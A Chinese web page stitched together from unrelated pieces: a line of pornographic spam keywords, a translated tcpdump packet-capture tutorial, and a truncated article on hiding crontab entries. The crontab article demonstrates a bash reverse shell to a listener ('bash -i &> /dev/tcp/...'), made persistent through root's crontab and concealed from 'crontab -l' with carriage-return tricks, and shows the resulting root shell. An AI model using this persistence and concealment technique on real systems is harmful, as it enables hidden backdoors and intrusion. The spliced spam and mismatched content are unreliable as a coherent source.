操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    創: 君子蘭 翻譯 云技術實踐



    靈活,強大的命令行工具有助于減輕網絡問題排查的痛苦。

    根據我作為系統管理員的經驗,我經常發現網絡連接問題難以排除故障。 對于那些情況,tcpdump是一個偉大的朋友。

    Tcpdump是一個命令行實用程序,允許捕獲和分析通過系統的網絡流量。它通常用于幫助解決網絡問題,以及安全工具。

    tcpdump是一個功能強大且功能多樣的工具,包含許多選項和過濾器,可用于各種情況。 由于它是一個命令行工具,因此最好在遠程服務器或GUI不可用的設備上運行,以收集以后可以分析的數據。 它也可以在后臺啟動,也可以使用cron等工具作為預定作業啟動。

    在本文中,我們將介紹一些tcpdump最常見的功能。

    1.在Linux上安裝

    Tcpdump包含在幾個Linux發行版中,所以很可能已經安裝了它。使用以下命令檢查系統上是否安裝了tcpdump:

    $ which tcpdump

    /usr/sbin/tcpdump

    如果未安裝tcpdump,則可以使用分發包管理器安裝它。例如,在CentOS或Red Hat Enterprise Linux上,如下所示:

    $ sudo yum install -y tcpdump

    Tcpdump需要libpcap,這是一個用于網絡數據包捕獲的庫。如果未安裝,它將自動添加為依賴項。

    現在準備開始抓取數據包。

    2.使用tcpdump抓取數據包

    要抓取數據包以進行故障排除或分析,tcpdump需要提升權限,因此在以下示例中,大多數命令都以sudo為前綴。

    首先,使用命令tcpdump -D查看哪些接口可用于捕獲:

    $ sudo tcpdump -D

    1.eth0

    2.virbr0

    3.eth1

    4.any (Pseudo-device that captures on all interfaces)

    5.lo [Loopback]

    在上面的示例中,可以看到計算機中可用的所有接口。特殊接口any允許在任何活動界面中捕獲。

    讓我們來開始捕獲一些數據包。通過運行此命令捕獲任何接口中的所有數據包:

    $ sudo tcpdump -i any

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    09:56:18.293641 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 3770820720:3770820916, ack 3503648727, win 309, options [nop,nop,TS val 76577898 ecr 510770929], length 196

    09:56:18.293794 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 196, win 391, options [nop,nop,TS val 510771017 ecr 76577898], length 0

    09:56:18.295058 IP rhel75.59883 > gateway.domain: 2486+ PTR? 1.64.168.192.in-addr.arpa. (43)

    09:56:18.310225 IP gateway.domain > rhel75.59883: 2486 NXDomain* 0/1/0 (102)

    09:56:18.312482 IP rhel75.49685 > gateway.domain: 34242+ PTR? 28.64.168.192.in-addr.arpa. (44)

    09:56:18.322425 IP gateway.domain > rhel75.49685: 34242 NXDomain* 0/1/0 (103)

    09:56:18.323164 IP rhel75.56631 > gateway.domain: 29904+ PTR? 1.122.168.192.in-addr.arpa. (44)

    09:56:18.323342 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 196:584, ack 1, win 309, options [nop,nop,TS val 76577928 ecr 510771017], length 388

    09:56:18.323563 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 584, win 411, options [nop,nop,TS val 510771047 ecr 76577928], length 0

    09:56:18.335569 IP gateway.domain > rhel75.56631: 29904 NXDomain* 0/1/0 (103)

    09:56:18.336429 IP rhel75.44007 > gateway.domain: 61677+ PTR? 98.122.168.192.in-addr.arpa. (45)

    09:56:18.336655 IP gateway.domain > rhel75.44007: 61677* 1/0/0 PTR rhel75. (65)

    09:56:18.337177 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 584:1644, ack 1, win 309, options [nop,nop,TS val 76577942 ecr 510771047], length 1060

    ---- SKIPPING LONG OUTPUT -----

    09:56:19.342939 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 1752016, win 1444, options [nop,nop,TS val 510772067 ecr 76578948], length 0

    ^C

    9003 packets captured

    9010 packets received by filter

    7 packets dropped by kernel

    $

    Tcpdump繼續捕獲數據包,直到收到中斷信號??梢园碈trl + C中斷捕獲。正如在此示例中所看到的,tcpdump捕獲了超過9,000個數據包。在這種情況下,由于我使用ssh連接到此服務器,tcpdump捕獲了所有這些包。要限制捕獲的數據包數并停止tcpdump,請使用-c選項:

    $ sudo tcpdump -i any -c 5

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    11:21:30.242740 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 3772575680:3772575876, ack 3503651743, win 309, options [nop,nop,TS val 81689848 ecr 515883153], length 196

    11:21:30.242906 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 196, win 1443, options [nop,nop,TS val 515883235 ecr 81689848], length 0

    11:21:30.244442 IP rhel75.43634 > gateway.domain: 57680+ PTR? 1.64.168.192.in-addr.arpa. (43)

    11:21:30.244829 IP gateway.domain > rhel75.43634: 57680 NXDomain 0/0/0 (43)

    11:21:30.247048 IP rhel75.33696 > gateway.domain: 37429+ PTR? 28.64.168.192.in-addr.arpa. (44)

    5 packets captured

    12 packets received by filter

    0 packets dropped by kernel

    $

    在這種情況下,tcpdump在捕獲五個數據包后自動停止捕獲。這在不同的場景中很有用,例如,如果正在排除連接并捕獲一些初始包就足夠了。當我們應用過濾器捕獲特定數據包時,這甚至更有用(如下所示)。

    默認情況下,tcpdump將IP地址和端口解析為名稱,如上例所示。在排除網絡問題時,通常更容易使用IP地址和端口號;使用選項-n和端口解析與-nn禁用名稱解析:

    $ sudo tcpdump -i any -c5 -nn

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    23:56:24.292206 IP 192.168.64.28.22 > 192.168.64.1.35110: Flags [P.], seq 166198580:166198776, ack 2414541257, win 309, options [nop,nop,TS val 615664 ecr 540031155], length 196

    23:56:24.292357 IP 192.168.64.1.35110 > 192.168.64.28.22: Flags [.], ack 196, win 1377, options [nop,nop,TS val 540031229 ecr 615664], length 0

    23:56:24.292570 IP 192.168.64.28.22 > 192.168.64.1.35110: Flags [P.], seq 196:568, ack 1, win 309, options [nop,nop,TS val 615664 ecr 540031229], length 372

    23:56:24.292655 IP 192.168.64.1.35110 > 192.168.64.28.22: Flags [.], ack 568, win 1400, options [nop,nop,TS val 540031229 ecr 615664], length 0

    23:56:24.292752 IP 192.168.64.28.22 > 192.168.64.1.35110: Flags [P.], seq 568:908, ack 1, win 309, options [nop,nop,TS val 615664 ecr 540031229], length 340

    5 packets captured

    6 packets received by filter

    0 packets dropped by kernel

    如上所示,捕獲輸出現在顯示IP地址和端口號。這還可以防止tcpdump發出DNS查找,這有助于在排除網絡問題時降低網絡流量。

    現在已經能夠捕獲網絡數據包了,讓我們來探索一下這些輸出意味著什么。

    3.了解輸出格式

    Tcpdump能夠捕獲和解碼許多不同的協議,例如TCP,UDP,ICMP等等。雖然我們不能在這里介紹所有這些,但為了幫助入門,讓我們探索TCP數據包??梢栽趖cpdump的手冊頁中找到有關不同協議格式的更多詳細信息。tcpdump捕獲的典型TCP數據包如下所示:

    08:41:13.729687 IP 192.168.64.28.22 > 192.168.64.1.41916: Flags [P.], seq 196:568, ack 1, win 309, options [nop,nop,TS val 117964079 ecr 816509256], length 372

    字段可能會根據發送的數據包類型而有所不同,但這是一般格式。

    第一個字段08:41:13.729687表示根據本地時鐘接收的數據包的時間戳。

    接下來,IP表示網絡層協議 - 在這種情況下是IPv4。對于IPv6數據包,值為IP6。

    下一個字段192.168.64.28.22是源IP地址和端口。接下來是目標IP地址和端口,由192.168.64.1.41916表示。

    在源和目標之后,可以找到TCP 標記 [P.]。 該字段的典型值包括:

    值標記類型描述SSYN連接開始FFIN連接結束PPUSH數據 pushRRST連接重置.ACK確認

    該字段也可以是這些值的組合,例如用于SYN-ACK分組的[S.]。

    接下來是數據包中包含的數據的序列號。對于捕獲的第一個數據包,這是一個絕對數字。后續數據包使用相對數字,以便更容易遵循。在該示例中,序列是seq 196:568,這意味著該分組包含該流的字節196到568。

    接下來是Ack編號:ack 1.在這種情況下,它是1,因為這是發送數據的一方。對于接收數據的一方,該字段表示該流上的下一個預期字節(數據)。例如,此流程中下一個數據包的Ack編號為568。

    下一個字段是窗口大小win 309,它表示接收緩沖區中可用的字節數,后跟TCP選項,例如MSS(最大段大?。┗虼翱诒壤?。有關TCP協議選項的詳細信息,請參閱傳輸控制協議(TCP)參數。

    最后,我們有數據包長度,長度372,它表示有效載荷數據的長度(以字節為單位)。長度是序列號中最后一個字節和第一個字節之間的差值。

    現在讓我們學習如何過濾包以縮小結果范圍,并更輕松地解決特定問題。

    4.過濾數據包

    如上所述,tcpdump可以捕獲太多的軟件包,其中一些甚至與正在排除故障的問題無關。 例如,如果正在解決與Web服務器的連接問題,那么對SSH流量不感興趣,因此從輸出中刪除SSH數據包可以更輕松地處理真正的問題。

    tcpdump最強大的功能之一是它能夠使用各種參數過濾捕獲的數據包,例如源和目標IP地址,端口,協議等。讓我們看看一些最常見的參數。

    協議

    要根據協議過濾數據包,請在命令行中指定協議。例如,僅使用以下命令捕獲ICMP數據包:

    $ sudo tcpdump -i any -c5 icmp

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    在另一個終端中,嘗試ping另一臺機器:

    $ ping opensource.com

    PING opensource.com (54.204.39.132) 56(84) bytes of data.

    64 bytes from ec2-54-204-39-132.compute-1.amazonaws.com (54.204.39.132): icmp_seq=1 ttl=47 time=39.6 ms

    回到tcpdump捕獲,請注意tcpdump僅捕獲并顯示與ICMP相關的數據包。在這種情況下,tcpdump不顯示解析名稱opensource.com時生成的名稱解析數據包:

    09:34:20.136766 IP rhel75 > ec2-54-204-39-132.compute-1.amazonaws.com: ICMP echo request, id 20361, seq 1, length 64

    09:34:20.176402 IP ec2-54-204-39-132.compute-1.amazonaws.com > rhel75: ICMP echo reply, id 20361, seq 1, length 64

    09:34:21.140230 IP rhel75 > ec2-54-204-39-132.compute-1.amazonaws.com: ICMP echo request, id 20361, seq 2, length 64

    09:34:21.180020 IP ec2-54-204-39-132.compute-1.amazonaws.com > rhel75: ICMP echo reply, id 20361, seq 2, length 64

    09:34:22.141777 IP rhel75 > ec2-54-204-39-132.compute-1.amazonaws.com: ICMP echo request, id 20361, seq 3, length 64

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    主機

    使用主機過濾器將捕獲限制為僅限與特定主機相關的數據包

    $ sudo tcpdump -i any -c5 -nn host 54.204.39.132

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    09:54:20.042023 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [S], seq 1375157070, win 29200, options [mss 1460,sackOK,TS val 122350391 ecr 0,nop,wscale 7], length 0

    09:54:20.088127 IP 54.204.39.132.80 > 192.168.122.98.39326: Flags [S.], seq 1935542841, ack 1375157071, win 28960, options [mss 1460,sackOK,TS val 522713542 ecr 122350391,nop,wscale 9], length 0

    09:54:20.088204 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 122350437 ecr 522713542], length 0

    09:54:20.088734 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 122350438 ecr 522713542], length 112: HTTP: GET / HTTP/1.1

    09:54:20.129733 IP 54.204.39.132.80 > 192.168.122.98.39326: Flags [.], ack 113, win 57, options [nop,nop,TS val 522713552 ecr 122350438], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    在此示例中,tcpdump僅捕獲并顯示與主機54.204.39.132之間的數據包。

    端口

    要根據所需的服務或端口過濾數據包,請使用端口過濾器。例如,使用以下命令捕獲與Web(HTTP)服務相關的數據包:

    $ sudo tcpdump -i any -c5 -nn port 80

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    09:58:28.790548 IP 192.168.122.98.39330 > 54.204.39.132.80: Flags [S], seq 1745665159, win 29200, options [mss 1460,sackOK,TS val 122599140 ecr 0,nop,wscale 7], length 0

    09:58:28.834026 IP 54.204.39.132.80 > 192.168.122.98.39330: Flags [S.], seq 4063583040, ack 1745665160, win 28960, options [mss 1460,sackOK,TS val 522775728 ecr 122599140,nop,wscale 9], length 0

    09:58:28.834093 IP 192.168.122.98.39330 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 122599183 ecr 522775728], length 0

    09:58:28.834588 IP 192.168.122.98.39330 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 122599184 ecr 522775728], length 112: HTTP: GET / HTTP/1.1

    09:58:28.878445 IP 54.204.39.132.80 > 192.168.122.98.39330: Flags [.], ack 113, win 57, options [nop,nop,TS val 522775739 ecr 122599184], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    追蹤IP/主機名

    還可以根據源或目標IP地址或主機名過濾數據包。例如,要從主機192.168.122.98捕獲數據包:

    $ sudo tcpdump -i any -c5 -nn src 192.168.122.98

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:02:15.220824 IP 192.168.122.98.39436 > 192.168.122.1.53: 59332+ A? opensource.com. (32)

    10:02:15.220862 IP 192.168.122.98.39436 > 192.168.122.1.53: 20749+ AAAA? opensource.com. (32)

    10:02:15.364062 IP 192.168.122.98.39334 > 54.204.39.132.80: Flags [S], seq 1108640533, win 29200, options [mss 1460,sackOK,TS val 122825713 ecr 0,nop,wscale 7], length 0

    10:02:15.409229 IP 192.168.122.98.39334 > 54.204.39.132.80: Flags [.], ack 669337581, win 229, options [nop,nop,TS val 122825758 ecr 522832372], length 0

    10:02:15.409667 IP 192.168.122.98.39334 > 54.204.39.132.80: Flags [P.], seq 0:112, ack 1, win 229, options [nop,nop,TS val 122825759 ecr 522832372], length 112: HTTP: GET / HTTP/1.1

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    請注意,tcpdumps捕獲了源IP地址為192.168.122.98的數據包,用于多種服務,例如名稱解析(端口53)和HTTP(端口80)。由于源IP不同,因此不顯示響應數據包。

    相反,可以使用dst過濾器按目標IP /主機名進行過濾:

    $ sudo tcpdump -i any -c5 -nn dst 192.168.122.98

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:05:03.572931 IP 192.168.122.1.53 > 192.168.122.98.47049: 2248 1/0/0 A 54.204.39.132 (48)

    10:05:03.572944 IP 192.168.122.1.53 > 192.168.122.98.47049: 33770 0/0/0 (32)

    10:05:03.621833 IP 54.204.39.132.80 > 192.168.122.98.39338: Flags [S.], seq 3474204576, ack 3256851264, win 28960, options [mss 1460,sackOK,TS val 522874425 ecr 122993922,nop,wscale 9], length 0

    10:05:03.667767 IP 54.204.39.132.80 > 192.168.122.98.39338: Flags [.], ack 113, win 57, options [nop,nop,TS val 522874436 ecr 122993972], length 0

    10:05:03.672221 IP 54.204.39.132.80 > 192.168.122.98.39338: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 522874437 ecr 122993972], length 642: HTTP: HTTP/1.1 302 Found

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    復雜過濾

    還可以使用邏輯運算符組合過濾器,或者創建更復雜的表達式。例如,要從源IP地址192.168.122.98和僅HTTP服務過濾數據包,請使用以下命令:

    $ sudo tcpdump -i any -c5 -nn src 192.168.122.98 and port 80

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:08:00.472696 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [S], seq 2712685325, win 29200, options [mss 1460,sackOK,TS val 123170822 ecr 0,nop,wscale 7], length 0

    10:08:00.516118 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [.], ack 268723504, win 229, options [nop,nop,TS val 123170865 ecr 522918648], length 0

    10:08:00.516583 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [P.], seq 0:112, ack 1, win 229, options [nop,nop,TS val 123170866 ecr 522918648], length 112: HTTP: GET / HTTP/1.1

    10:08:00.567044 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [.], ack 643, win 239, options [nop,nop,TS val 123170916 ecr 522918661], length 0

    10:08:00.788153 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [F.], seq 112, ack 643, win 239, options [nop,nop,TS val 123171137 ecr 522918661], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    可以通過使用括號對過濾器進行分組來創建更復雜的表達式。在這種情況下,請用引號括起整個過濾器表達式,以防止shell將它們與shell表達式混淆:

    $ sudo tcpdump -i any -c5 -nn "port 80 and (src 192.168.122.98 or src 54.204.39.132)"

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:10:37.602214 IP 192.168.122.98.39346 > 54.204.39.132.80: Flags [S], seq 871108679, win 29200, options [mss 1460,sackOK,TS val 123327951 ecr 0,nop,wscale 7], length 0

    10:10:37.650651 IP 54.204.39.132.80 > 192.168.122.98.39346: Flags [S.], seq 854753193, ack 871108680, win 28960, options [mss 1460,sackOK,TS val 522957932 ecr 123327951,nop,wscale 9], length 0

    10:10:37.650708 IP 192.168.122.98.39346 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 123328000 ecr 522957932], length 0

    10:10:37.651097 IP 192.168.122.98.39346 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 123328000 ecr 522957932], length 112: HTTP: GET / HTTP/1.1

    10:10:37.692900 IP 54.204.39.132.80 > 192.168.122.98.39346: Flags [.], ack 113, win 57, options [nop,nop,TS val 522957942 ecr 123328000], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    在此示例中,我們僅過濾HTTP服務(端口80)和源IP地址192.168.122.98或54.204.39.132的數據包。這是檢查同一流程兩側的快速方法。

    5.檢查包內容

    在前面的示例中,我們僅檢查數據包的標頭,以獲取源,目標,端口等信息。有時,這就是解決網絡連接問題所需的全部內容。但是,有時我們需要檢查數據包的內容,以確保我們發送的消息包含我們需要的消息或我們收到的預期響應。 要查看數據包內容,tcpdump提供了兩個附加標志:-X以十六進制打印內容,ASCII或-A以ASCII格式打印內容。

    例如,檢查Web請求的HTTP內容,如下所示:

    $ sudo tcpdump -i any -c10 -nn -A port 80

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    13:02:14.871803 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [S], seq 2546602048, win 29200, options [mss 1460,sackOK,TS val 133625221 ecr 0,nop,wscale 7], length 0

    E..<..@.@.....zb6.'....P...@......r............

    ............................

    13:02:14.910734 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [S.], seq 1877348646, ack 2546602049, win 28960, options [mss 1460,sackOK,TS val 525532247 ecr 133625221,nop,wscale 9], length 0

    E..<..@./..a6.'...zb.P..o..&...A..q a..........

    .R.W....... ................

    13:02:14.910832 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 133625260 ecr 525532247], length 0

    E..4..@.@.....zb6.'....P...Ao..'...........

    .....R.W................

    13:02:14.911808 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 133625261 ecr 525532247], length 112: HTTP: GET / HTTP/1.1

    E.....@.@..1..zb6.'....P...Ao..'...........

    .....R.WGET / HTTP/1.1

    User-Agent: Wget/1.14 (linux-gnu)

    Accept: */*

    Host: opensource.com

    Connection: Keep-Alive

    ................

    13:02:14.951199 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [.], ack 113, win 57, options [nop,nop,TS val 525532257 ecr 133625261], length 0

    E..4.F@./.."6.'...zb.P..o..'.......9.2.....

    .R.a....................

    13:02:14.955030 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 525532258 ecr 133625261], length 642: HTTP: HTTP/1.1 302 Found

    E....G@./...6.'...zb.P..o..'.......9.......

    .R.b....HTTP/1.1 302 Found

    Server: nginx

    Date: Sun, 23 Sep 2018 17:02:14 GMT

    Content-Type: text/html; charset=iso-8859-1

    Content-Length: 207

    X-Content-Type-Options: nosniff

    Location: https://opensource.com/

    Cache-Control: max-age=1209600

    Expires: Sun, 07 Oct 2018 17:02:14 GMT

    X-Request-ID: v-6baa3acc-bf52-11e8-9195-22000ab8cf2d

    X-Varnish: 632951979

    Age: 0

    Via: 1.1 varnish (Varnish/5.2)

    X-Cache: MISS

    Connection: keep-alive

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

    <html><head>

    <title>302 Found</title>

    </head><body>

    <h1>Found</h1>

    <p>The document has moved <a >here</a>.</p>

    </body></html>

    ................

    13:02:14.955083 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [.], ack 643, win 239, options [nop,nop,TS val 133625304 ecr 525532258], length 0

    E..4..@.@.....zb6.'....P....o..............

    .....R.b................

    13:02:15.195524 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [F.], seq 113, ack 643, win 239, options [nop,nop,TS val 133625545 ecr 525532258], length 0

    E..4..@.@.....zb6.'....P....o..............

    .....R.b................

    13:02:15.236592 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [F.], seq 643, ack 114, win 57, options [nop,nop,TS val 525532329 ecr 133625545], length 0

    E..4.H@./.. 6.'...zb.P..o..........9.I.....

    .R......................

    13:02:15.236656 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [.], ack 644, win 239, options [nop,nop,TS val 133625586 ecr 525532329], length 0

    E..4..@.@.....zb6.'....P....o..............

    .....R..................

    10 packets captured

    10 packets received by filter

    0 packets dropped by kernel

    這有助于解決API調用問題,假設調用使用普通HTTP。對于加密連接,此輸出不太有用。

    6.將捕獲保存到文件

    tcpdump提供的另一個有用功能是能夠將捕獲保存到文件中,以便稍后分析結果。例如,這允許你在批處理模式下捕獲數據包,并在早上驗證結果。當有太多數據包需要分析時,它也會有所幫助,因為實時捕獲可能發生得太快。

    要將數據包保存到文件而不是在屏幕上顯示,請使用選項-w:

    $ sudo tcpdump -i any -c10 -nn -w webserver.pcap port 80

    [sudo] password for ricardo:

    tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10 packets captured

    10 packets received by filter

    0 packets dropped by kernel

    此命令將輸出保存在名為webserver.pcap的文件中。.pcap擴展名代表“數據包捕獲”,是此文件格式的約定。

    如此示例所示,屏幕上不會顯示任何內容,并且根據選項-c10捕獲10個數據包后捕獲完成。 如果需要一些反饋以確保捕獲數據包,請使用選項-v。

    Tcpdump以二進制格式創建文件,因此不能簡單地使用文本編輯器打開它。要讀取文件的內容,請使用-r選項執行tcpdump:

    $ tcpdump -nn -r webserver.pcap

    reading from file webserver.pcap, link-type LINUX_SLL (Linux cooked)

    13:36:57.679494 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [S], seq 3709732619, win 29200, options [mss 1460,sackOK,TS val 135708029 ecr 0,nop,wscale 7], length 0

    13:36:57.718932 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [S.], seq 1999298316, ack 3709732620, win 28960, options [mss 1460,sackOK,TS val 526052949 ecr 135708029,nop,wscale 9], length 0

    13:36:57.719005 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 135708068 ecr 526052949], length 0

    13:36:57.719186 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 135708068 ecr 526052949], length 112: HTTP: GET / HTTP/1.1

    13:36:57.756979 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [.], ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 0

    13:36:57.760122 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 642: HTTP: HTTP/1.1 302 Found

    13:36:57.760182 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [.], ack 643, win 239, options [nop,nop,TS val 135708109 ecr 526052959], length 0

    13:36:57.977602 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [F.], seq 113, ack 643, win 239, options [nop,nop,TS val 135708327 ecr 526052959], length 0

    13:36:58.022089 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [F.], seq 643, ack 114, win 57, options [nop,nop,TS val 526053025 ecr 135708327], length 0

    13:36:58.022132 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [.], ack 644, win 239, options [nop,nop,TS val 135708371 ecr 526053025], length 0

    $

    由于不再直接從網絡接口捕獲數據包,因此不需要sudo來讀取該文件。

    還可以使用我們討論過的任何過濾器來過濾文件中的內容,就像使用實時數據一樣。 例如,通過執行以下命令從源IP地址54.204.39.132檢查捕獲文件中的數據包:

    $ tcpdump -nn -r webserver.pcap src 54.204.39.132

    reading from file webserver.pcap, link-type LINUX_SLL (Linux cooked)

    13:36:57.718932 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [S.], seq 1999298316, ack 3709732620, win 28960, options [mss 1460,sackOK,TS val 526052949 ecr 135708029,nop,wscale 9], length 0

    13:36:57.756979 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [.], ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 0

    13:36:57.760122 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 642: HTTP: HTTP/1.1 302 Found

    13:36:58.022089 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [F.], seq 643, ack 114, win 57, options [nop,nop,TS val 526053025 ecr 135708327], length 0

    下一步是什么?

    tcpdump的這些基本功能將幫助你開始使用這個功能強大的多功能工具。要了解更多信息,請參閱tcpdump網站和手冊頁。

    tcpdump命令行界面為捕獲和分析網絡流量提供了極大的靈活性。如果你需要圖形工具來了解更復雜的流程,請查看Wireshark。

    Wireshark的一個好處是它可以讀取tcpdump捕獲的.pcap文件。 可以使用tcpdump在沒有GUI的遠程計算機中捕獲數據包,并使用Wireshark分析結果文件,但這是另一個主題。

    原文鏈接(英文):

    https://opensource.com/article/18/10/introduction-tcpdump

    一 前言

    前幾天朋友發一個文章,是關于crontab的隱藏的,漲姿勢了,所以就學習下,覺得還蠻實用的,于是有了這篇文章。

    二 crontab隱藏

    2.1 從一條命令說起

    以下命令比較奇怪,我們明明輸入文件內容是"abb\rocddde" 但是直接用cat輸出的時候是\r后面的內容。這里面 echo -e 表示啟用反斜杠轉義的解釋即\r 表示回車。

    root@ubuntu-lab:/home/miao# echo  -e "abb\rocddde"> b.txt 
root@ubuntu-lab:/home/miao# cat b.txt 
ocddde
root@ubuntu-lab:/home/miao# cat -A b.txt
abb^Mocddde$

    這說明cat在輸出時候,如果有回車,則顯示會有問題,用參數:-A 即可顯示所有內容:

     -A, --show-all
              equivalent to -vET

 -E, --show-ends
              display $ at end of each line
 -v, --show-nonprinting
              use ^ and M- notation, except for LFD and TAB
-T, --show-tabs
              display TAB characters as ^I

    了解了這個缺陷,再知道crontab -l 其實是cat 此用戶對應的crontab文件即: /var/spool/cron/crontabs/root

    2.2 crontab 隱藏

    測試的腳本涉及到shell反彈,先測試下,啟動一個端口(攻擊端)

    root@ubuntu-lab:/home/miao# nc -lnvp 1111
Listening on 0.0.0.0 1111

    被攻擊端反向連接:

    root@ubuntu-lab:/home/miao# bash -i &> /dev/tcp/127.0.0.1/1111 0>&1

    具體shell反彈的解釋見:https://www.jianshu.com/p/41fffb0654a7 簡單來說把bash的輸入輸出,錯誤輸出都重定向到tcp連接上去。

    剛才是一次執行,如果攻擊端的端口1111 沒有開啟的話,會報連接錯誤:

    root@ubuntu-lab:/home/miao# bash -i &> /dev/tcp/127.0.0.1/1111 0>&1
bash: connect: Connection refused
bash: /dev/tcp/127.0.0.1/1111: Connection refused

    那么如何保證被攻擊端定時連接,直到我們開啟端口那,很顯然我們可以采用crontab方式。

    初次版本:

    root@ubuntu-lab:/home/miao# echo  "*/1 * * * * bash -i &> /dev/tcp/127.0.0.1/1111 0>&1 " >/var/spool/cron/crontabs/root
root@ubuntu-lab:/home/miao# crontab -l
*/1 * * * * bash -c "bash -i &> /dev/tcp/127.0.0.1/1111 0>&1 "

    顯然如果這樣達不到隱藏效果,隱藏下很簡單加個回車就行,但是不能僅僅沒顯示,我們要讓crontab -l展示的信息和沒有配置crontab是一樣的。

    這樣寫crontab不好測試,也可以獨立寫個shell:

    root@ubuntu-lab:/home/miao# crontab -l
*/1 * * * * sh /home/miao/1.sh

root@ubuntu-lab:/home/miao# cat 1.sh
#!/bin/bash
echo `date` >/home/miao/122
echo $? >>/home/miao/122
bash -c "bash -i &> /dev/tcp/127.0.0.1/1111 0>&1 "

    效果如下:

    root@ubuntu-lab:/home/miao# nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 127.0.0.1 57768
bash: cannot set terminal process group (8552): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu-lab:~# 
root@ubuntu-lab:~# pwd
pwd
/root
root@ubuntu-lab:~# cd /home/miao
